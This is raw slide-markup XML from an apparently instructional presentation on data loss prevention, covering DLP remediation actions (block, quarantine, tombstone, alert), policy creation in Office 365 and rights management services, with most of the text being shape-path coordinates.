                  <a:lnTo>
                    <a:pt x="2336584" y="3171126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2381389" y="3151568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2425535" y="3130600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2469019" y="3108236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2511806" y="3084474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2553855" y="3059341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2595156" y="3032836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2631833" y="3007614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635669" y="3004985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2675369" y="2975775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2714231" y="2945231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2752229" y="2913367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2789313" y="2880182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2825496" y="2845689"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3531234" h="3409315">
                  <a:moveTo>
                    <a:pt x="2837688" y="562483"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2801505" y="528053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764421" y="494919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2726423" y="463067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687561" y="432523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2647861" y="403313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2607348" y="375437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2566047" y="348919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2523998" y="323748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2481211" y="299974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2437727" y="277571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2393581" y="256578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2348776" y="236994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2303373" y="218846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2257374" y="202133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2210816" y="186880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163737" y="173088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2116150" y="160782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2068093" y="149974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2019592" y="140665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1970659" y="132867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1921357" y="126619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1871687" y="121907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821688" y="118745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1742821" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1662176" y="118745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1612366" y="121907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1562849" y="126619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1513674" y="132867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1464856" y="140665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1416418" y="149974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1368412" y="160782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1320838" y="173088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1273759" y="186880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1227188" y="202133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181163" y="218846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1135710" y="236994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1090866" y="256578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046645" y="277571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1003096" y="299974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="960247" y="323748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="918121" y="348919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="876757" y="375437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836180" y="403313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="796417" y="432523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="757504" y="463067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719467" y="494919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682345" y="528053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646176" y="562483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="851027" y="762000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="887145" y="727913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924433" y="695388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="962837" y="664464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002309" y="635152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042822" y="607466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1084300" y="581444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1126718" y="557085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170038" y="534416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1214196" y="513448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1259154" y="494207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1304861" y="476719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1351292" y="460984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398371" y="447040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1446085" y="434886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1494370" y="424548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1543177" y="416052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1592478" y="409422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642211" y="404647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1692338" y="401777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1742821" y="400812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1793265" y="401777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1843341" y="404647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1893011" y="409422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1942223" y="416052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1990953" y="424548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2039150" y="434886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2086762" y="447040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2133765" y="460984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2180107" y="476719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2225751" y="494207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2270645" y="513448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2314765" y="534416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2358047" y="557085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2400477" y="581444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2441994" y="607466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2482558" y="635152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2522131" y="664464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2560663" y="695388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2598128" y="727913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2634488" y="762000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2837688" y="562483"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3531234" h="3409315">
                  <a:moveTo>
                    <a:pt x="3531108" y="1702181"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3410458" y="1624584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407257" y="1575384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3402469" y="1526501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3396119" y="1477975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3388207" y="1429842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3378746" y="1382102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3367760" y="1334820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3355263" y="1287995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3341255" y="1241666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3325761" y="1195857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3308781" y="1150607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3290341" y="1105928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3270453" y="1061847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3249130" y="1018400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3226371" y="975626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3202216" y="933526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3176651" y="892149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3149714" y="851509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3121393" y="811644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3091726" y="772579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3060712" y="734339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3028365" y="696950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2994698" y="660450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2959735" y="624840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2756916" y="824738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2790367" y="859015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822232" y="894219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2852509" y="930325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2881185" y="967282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908262" y="1005039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2933763" y="1043546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2957652" y="1082776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2979966" y="1122654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3000679" y="1163167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3019793" y="1204239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3037319" y="1245844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3053245" y="1287919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3067596" y="1330439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3080334" y="1373339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3091484" y="1416596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3101048" y="1460131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3109010" y="1503934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3115386" y="1547926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3120161" y="1592084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123349" y="1636356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3124949" y="1680692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3124949" y="1725053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123349" y="1769376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3120161" y="1813636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3115386" y="1857781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3109010" y="1901748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3101048" y="1945525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3091484" y="1989035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3080334" y="2032241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3067596" y="2075103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3053245" y="2117572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3037319" y="2159609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3019793" y="2201151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3000679" y="2242159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2979966" y="2282596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2957652" y="2322411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2933763" y="2361552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908262" y="2399969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2881185" y="2437638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2852509" y="2474493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822232" y="2510498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2790367" y="2545600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2756916" y="2579751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2959735" y="2781300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2994698" y="2745702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3028365" y="2709164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3060712" y="2671737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3091726" y="2633446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3121393" y="2594318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3149714" y="2554389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3176651" y="2513685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3202216" y="2472232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3226371" y="2430068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3249130" y="2387219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3270453" y="2343708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3290341" y="2299589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3308781" y="2254859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3325761" y="2209571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3341255" y="2163749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3355263" y="2117433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3367760" y="2070633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3378746" y="2023389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3388207" y="1975726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3396119" y="1927682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3402469" y="1879295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407257" y="1830578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3410458" y="1781556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3531108" y="1702181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76744" y="4818888"/>
              <a:ext cx="1342644" cy="134264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501264" y="1882292"/>
            <a:ext cx="11248390" cy="1732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Remediation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refers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3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action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DLP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software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takes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when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detects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policy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viola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ion.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typica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mediatio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mechan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sm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e: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050">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="45085">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Tombstone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12053" y="5323713"/>
            <a:ext cx="72517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5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Blo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ck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94163" y="5340477"/>
            <a:ext cx="150685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20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Quarantine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95793" y="7272908"/>
            <a:ext cx="126619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5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Alert</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-12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404040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70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45">
                <a:solidFill>
                  <a:srgbClr val="404040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45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>y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5700" y="306451"/>
            <a:ext cx="378460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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-160">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Loss</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-155">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prevention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82948" y="1933193"/>
            <a:ext cx="868616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screenshot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below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shows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creation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DLP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policy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Office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365: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44311" y="760476"/>
            <a:ext cx="5184647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308286" y="2645282"/>
            <a:ext cx="9657080" cy="5961380"/>
            <a:chOff x="3308286" y="2645282"/>
            <a:chExt cx="9657080" cy="596138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17747" y="2654807"/>
              <a:ext cx="9637776" cy="594207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313048" y="2650045"/>
              <a:ext cx="9647555" cy="5951855"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9647555" h="5951855">
                  <a:moveTo>
                    <a:pt x="0" y="5951601"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9647301" y="5951601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9647301" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5951601"/>
                  </a:lnTo>
                  <a:close/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8188" y="306451"/>
            <a:ext cx="511873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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rights</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="200">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Management</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-145">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Services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58209" y="1933193"/>
            <a:ext cx="833564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Rights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management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services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provide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following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functionality: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3815" y="731519"/>
            <a:ext cx="7056120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289468" y="3430968"/>
            <a:ext cx="4509770" cy="3276600"/>
            <a:chOff x="6289468" y="3430968"/>
            <a:chExt cx="4509770" cy="3276600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6294231" y="3435730"/>
              <a:ext cx="4076700" cy="3267075"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4076700" h="3267075">
                  <a:moveTo>
                    <a:pt x="3627897" y="26924"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3658000" y="64486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3687039" y="102530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3715018" y="141037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3741937" y="179991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3767799" y="219373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3792606" y="259167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3816360" y="299354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3839063" y="339917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3860716" y="380838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3881322" y="422101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3900883" y="463686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3919400" y="505578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3936876" y="547758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3953313" y="590208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3968712" y="632911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3983075" y="675850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3996406" y="719008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4008704" y="762365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4019973" y="805905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4030214" y="849611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4039430" y="893465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4047621" y="937448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4054791" y="981545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4060942" y="1025736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4066074" y="1070006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4070191" y="1114335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4073293" y="1158706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4075384" y="1203103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4076465" y="1247507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4076538" y="1291900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4075605" y="1336266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4073667" y="1380587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4070728" y="1424844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4066788" y="1469022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4061850" y="1513101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4055917" y="1557065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4048988" y="1600896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4041068" y="1644576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4032157" y="1688087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4022258" y="1731414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4011372" y="1774536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3999502" y="1817438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3986650" y="1860102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3972817" y="1902509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958006" y="1944643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3942218" y="1986486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3925455" y="2028021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3907720" y="2069229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3889014" y="2110093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869339" y="2150597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3848698" y="2190721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3827092" y="2230449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3804523" y="2269763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3780993" y="2308645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3756504" y="2347078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3731059" y="2385045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3704658" y="2422528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3677305" y="2459508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3649000" y="2495970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3619746" y="2531895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3589546" y="2567265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3558400" y="2602063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3526311" y="2636272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3493281" y="2669874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3459311" y="2702851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3424405" y="2735186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3388562" y="2766861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3351787" y="2797859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3314080" y="2828163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275656" y="2857592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3236740" y="2885983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3197349" y="2913336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3157502" y="2939654"/>
